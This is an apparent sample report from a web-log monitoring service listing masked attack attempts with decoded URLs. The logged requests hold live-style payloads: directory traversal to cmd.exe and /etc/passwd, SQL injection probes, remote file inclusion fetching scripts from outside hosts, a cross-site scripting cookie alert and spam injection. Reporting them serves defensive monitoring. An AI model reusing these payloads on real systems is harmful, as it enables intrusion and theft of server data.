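Because this report contains de-identified data, no log lines from live log files are shown.
Example of what a client report can look like (IP addresses are masked; the report's field labels are Källa = source, Land = country, Loggrad = log line, Avkodad URL = decoded URL):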
---- 2007-05-23 14:06:42 ----
Källa: XXX.XXX.XXX.XXX
Land: DE (Tyskland)
Loggrad: XXX.XXX.XXX.XXX - - [23/May/2008:14:06:42 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 199 "-" "-"
Avkodad URL: GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
---- 2007-05-23 14:06:41 ----
Källa: XXX.XXX.XXX.XXX
Land: DE (Tyskland)
Loggrad: XXX.XXX.XXX.XXX - - [23/May/2008:14:06:41 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 10625 "-" "-"
Avkodad URL: GET /MSADC/root.exe?/c dir
---- 2007-02-24 20:49:54 ----
Källa: XXX.XXX.XXX.XXX
Land: CN (Kina)
Loggrad: 2007-02-24 20:49:54 XXX.XXX.XXX.XXX - - - XXX.XXX.XXX.XXX 80 GET /Default.asp Sectionid=&Itemid=&Languageid=EN`%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20`%25`=` 200 0 12701 226 31 HTTP/1.1 Internet+Explorer+6.0 ASPSESSIONIDQQAQDSSD=DHLHAJAAGPIHJGDOJMIMKGPA -
Avkodad URL: GET /Default.asp Sectionid=&Itemid=&Languageid=EN` and char(124)+user+char(124)=0 and `%`=`
---- 2007-02-24 20:56:58 ----
Källa: XXX.XXX.XXX.XXX
Land: CN (Kina)
Loggrad: 2007-02-24 20:56:58 XXX.XXX.XXX.XXX - - - XXX.XXX.XXX.XXX 80 GET /Default.asp Sectionid=&Itemid=&Languageid=EN`%20and%201=1%20and%20``=` 200 0 12677 225 31 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDQQAQDSSD=KJLHAJAAEDPLLHAJJGNBFIDJ -
Avkodad URL: GET /Default.asp Sectionid=&Itemid=&Languageid=EN` and 1=1 and ``=`
---- 2007-02-24 23:52:15 ----
Källa: XXX.XXX.XXX.XXX
Land: US (Amerikas Förenta Stater)
Loggrad: 2007-02-24 23:52:15 XXX.XXX.XXX.XXX - - - XXX.XXX.XXX.XXX 80 GET /articles/ sIncPath=http://210.0.141.247/~test5/c.in??/ 404 2 - - - - Morfeus+Fucking+Scanner - -
Avkodad URL: GET /articles/ sIncPath=http://210.0.141.247/~test5/c.in??/
---- 2009-02-02 11:57:40 ----
Källa: XXX.XXX.XXX.XXX
Land: GB (United Kingdom)
Loggrad: 2009-02-02 11:57:40 W3SVC4 - XXX.XXX.XXX.XXX GET /sv/Sok/ quicksearchquery=Could+you+imagine+how+horrible+things+would+be+if+we+always+told+others+how+we+felt%3f+Life+would+be+intolerably+bearable.%0d%0a%5burl%3dhttp%3a%2f%2fwww.geocities.com%2fhdtvvidio2%2fhdtv.html%5d+does+msn+mail+have+a+mailbox+limit+%5b%2furl%5d%5burl%3dhttp%3a%2f%2fwww.geocities.com%2fhdtvvidio2%2findex.html%5d+how+to+copy+youtube+videos+%5b%2furl%5d%5burl%3dhttp%3a%2f%2fwww.geocities.com%2fyoutubeitlite%2findex.html%5d+foo+fighters+logo+myspace+2.0+layouts+%5b%2furl%5d%5burl%3dhttp%3a%2f%2fwww.geocities.com%2fmyspaceu2new%2findex2.html%5d+myspace+profiles+with++sexy+videos+%5b%2furl%5d%0d%0a%3ca+href%3dhttp%3a%2f%2fwww.geocities.com%2fyoutubeitlite%2findex.html+%3efoo+fighters+logo+myspace+2.0+layouts%3c%2fa%3e%3ca+href%3dhttp%3a%2f%2fwww.geocities.com%2fmyspaceu2new%2findex2.html+%3emyspace+profiles+with++sexy+videos%3c%2fa%3e%3ca+href%3dhttp%3a%2f%2fwww.geocities.com%2fmyspaceu2new%2findex.html+%3esex+chat+on+msn+live+messenger%3c%2fa%3e 80 - 85.12.64.149 - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - - - 200 0 3 - - -
Avkodad URL: GET /sv/Sok/ quicksearchquery=Could you imagine how horrible things would be if we always told others how we felt? Life would be intolerably bearable.[CR][LF][url=http://www.geocities.com/hdtvvidio2/hdtv.html] does msn mail have a mailbox limit [/url][url=http://www.geocities.com/hdtvvidio2/index.html] how to copy youtube videos [/url][url=http://www.geocities.com/youtubeitlite/index.html] foo fighters logo myspace 2.0 layouts [/url][url=http://www.geocities.com/myspaceu2new/index2.html] myspace profiles with sexy videos [/url][CR][LF]foo fighters logo myspace 2.0 layoutsmyspace profiles with sexy videossex chat on msn live messenger
---- 2009-01-26 05:36:56 ----
Källa: XXX.XXX.XXX.XXX
Land: RU (Russia)
Loggrad: XXX.XXX.XXX.XXX - - [26/Jan/2009:05:36:56 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-" "-"
Avkodad URL: GET /w00tw00t.at.ISC.SANS.DFind:)
---- 2008-12-09 09:24:51 ----
Källa: XXX.XXX.XXX.XXX
Land: CN (China)
Loggrad: XXX.XXX.XXX.XXX - - [09/Dec/2008:09:24:51 +0000] "GET /sarbarheter/sr/sr07-032-trend-micro-serverprotect-ett-flertal-sarbarheter/?searchterm=none`%20and%20user%3E0%20and%20``=` HTTP/1.1" 200 18136 "-" "-"
Avkodad URL: GET /sarbarheter/sr/sr07-032-trend-micro-serverprotect-ett-flertal-sarbarheter/?searchterm=none` and user>0 and ``=`
---- 2009-02-02 03:11:41 ----
Källa: XXX.XXX.XXX.XXX
Land: KR (South Korea)
Loggrad: XXX.XXX.XXX.XXX - - [02/Feb/2009:03:11:41 +0000] "GET //index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idz.txt?? HTTP/1.1" 404 10702 "-" "libwww-perl/5.803"
Avkodad URL: GET //index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://madrigaldelavera.es/joomla/mambots/editors/idz.txt??
---- 2009-02-06 22:11:30 ----
Källa: XXX.XXX.XXX.XXX
Land: US (United States)
Loggrad: 2009-02-06 22:11:30 W3SVC4 - XXX.XXX.XXX.XXX CONNECT / - 80 - 63.253.135.173 - - - - - 501 0 0 - - -
Avkodad URL: CONNECT /
---- 2009-02-05 16:07:45 ----
Källa: XXX.XXX.XXX.XXX
Land: SE (Sweden)
Loggrad: 2009-02-05 16:07:45 W3SVC1 - XXX.XXX.XXX.XXX TRACE /cuq0zpqz.html - 80 - XXX.XXX.XXX.XXX - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - - - 501 0 0 - - -
Avkodad URL: TRACE /cuq0zpqz.html
---- 2009-02-05 16:07:29 ----
Källa: XXX.XXX.XXX.XXX
Land: SE (Sweden)
Loggrad: 2009-02-05 16:07:29 W3SVC1 - XXX.XXX.XXX.XXX GET /launch.jsp NFuse_Application=>alert(document.cookie); 80 - XXX.XXX.XXX.XXX - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - - - 404 0 2 - - -
Avkodad URL: GET /launch.jsp NFuse_Application=>alert(document.cookie);
---- 2009-02-05 16:07:00 ----
Källa: XXX.XXX.XXX.XXX
Land: SE (Sweden)
Loggrad: 2009-02-05 16:07:00 W3SVC1 - XXX.XXX.XXX.XXX GET /Diary/source v=../../../../../../../../../../etc/passwd%00 80 - XXX.XXX.XXX.XXX - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - - - 404 0 2 - - -
Avkodad URL: GET /Diary/source v=../../../../../../../../../../etc/passwd